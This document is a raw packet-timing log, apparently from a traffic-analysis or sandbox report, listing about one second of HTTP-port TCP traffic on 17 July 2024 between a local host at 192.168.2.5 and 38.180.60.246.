                                                                            Jul 17, 2024 15:19:59.706439018 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.706743956 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.706799030 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.706835032 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.706857920 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.706918955 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.706953049 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.706965923 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.706985950 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707020044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707035065 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.707083941 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707115889 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707135916 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.707156897 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707190990 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707210064 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.707223892 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707257032 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707271099 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.707293034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707336903 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.707477093 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707509995 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707544088 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707556009 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.707576036 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707607985 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707618952 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.707643986 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707678080 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707691908 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.707710981 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707743883 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.707756996 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.708071947 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708106041 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708121061 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.708138943 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708173990 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708183050 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.708208084 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708240032 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708256006 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.708271980 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708303928 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708313942 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.708338022 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708370924 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708380938 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.708403111 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708444118 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708450079 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.708540916 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708595991 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.708656073 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708688021 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708733082 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.708795071 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708811045 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708826065 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708841085 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.708868980 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.708890915 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.710494041 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710510969 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710526943 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710542917 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710558891 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710617065 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.710745096 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710769892 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710784912 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710798979 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.710799932 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710814953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710829973 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710841894 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.710844040 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710859060 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710874081 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710875988 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.710890055 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710905075 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.710906029 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.710936069 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.710958004 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.711136103 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711160898 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711175919 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711193085 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711206913 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.711209059 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711224079 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711240053 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711244106 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.711256981 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711266041 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.711311102 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.711503029 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711518049 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711534023 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711549044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711565018 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711580992 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711582899 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.711599112 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711613894 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.711613894 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711630106 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711642027 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.711643934 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711661100 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.711668015 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.711710930 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.727699995 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.796550035 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.796610117 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.796646118 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.796680927 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.796684980 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.796714067 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.796751022 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.796751976 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.796787024 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.796806097 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.796819925 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892653942 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892658949 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892683983 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892710924 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892714024 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892740011 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892781019 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892781973 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892812014 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892839909 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892839909 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892865896 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892893076 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892895937 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892920971 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892946959 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892955065 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.893003941 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.900707006 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.900742054 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.900779009 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.900829077 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.900861979 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.900895119 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.900949001 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.900988102 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901020050 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901052952 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901087046 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901118994 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901170015 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901237965 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901272058 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901304960 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901336908 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901392937 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901448965 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901495934 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901530981 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901565075 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901597023 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901633978 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901685953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901717901 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901751041 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901782990 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901818037 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901853085 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901885986 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901918888 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901952028 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901987076 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.902014971 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.902472019 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.980911970 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.980943918 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.980957985 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.980986118 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981002092 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981017113 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981030941 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981106997 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981154919 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.981223106 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.981700897 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981725931 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981740952 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981792927 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.981864929 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981879950 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981894970 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981910944 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981913090 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.981928110 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981939077 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.981981993 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.983666897 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983722925 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983737946 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983768940 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.983803034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983817101 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983830929 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983844995 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983850956 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.983881950 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.983925104 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983939886 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983953953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983969927 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983973980 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.983984947 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983999968 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984000921 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984015942 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984036922 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984065056 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984262943 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984277964 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984292984 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984308004 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984323025 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984337091 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984342098 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984353065 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984385014 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984416962 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984441996 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984457016 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984467030 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984472036 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984494925 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984510899 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984515905 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984529018 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984546900 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984585047 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984700918 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984899044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984914064 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984927893 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984935999 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984946966 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984950066 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984965086 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984971046 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984980106 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984996080 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985011101 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985018015 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985025883 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985039949 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985042095 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985054970 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985069990 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985075951 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985085011 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985100031 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985106945 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985141993 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985163927 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985177994 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985200882 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985214949 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985249043 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985270023 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985341072 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985353947 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985368013 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985383034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985397100 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985399961 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985430002 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985502958 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985517025 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985532045 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985547066 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985558033 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985562086 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985575914 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985582113 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985590935 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985658884 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985968113 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.986017942 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.986031055 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.986032963 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.986063004 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.986071110 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.986084938 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.986119986 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.991569042 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.991617918 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.993786097 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.993840933 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.993854046 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.993856907 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.993915081 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.993947983 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.993963003 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.993977070 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.993993044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994008064 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994009972 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994050980 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994132996 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994148016 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994160891 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994175911 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994184017 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994191885 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994206905 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994216919 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994221926 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994268894 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.169629097 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.169709921 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.169724941 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.169739962 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.169756889 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.169763088 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.169773102 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.169792891 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.169830084 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.169863939 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.169879913 CEST804970438.180.60.246192.168.2.5
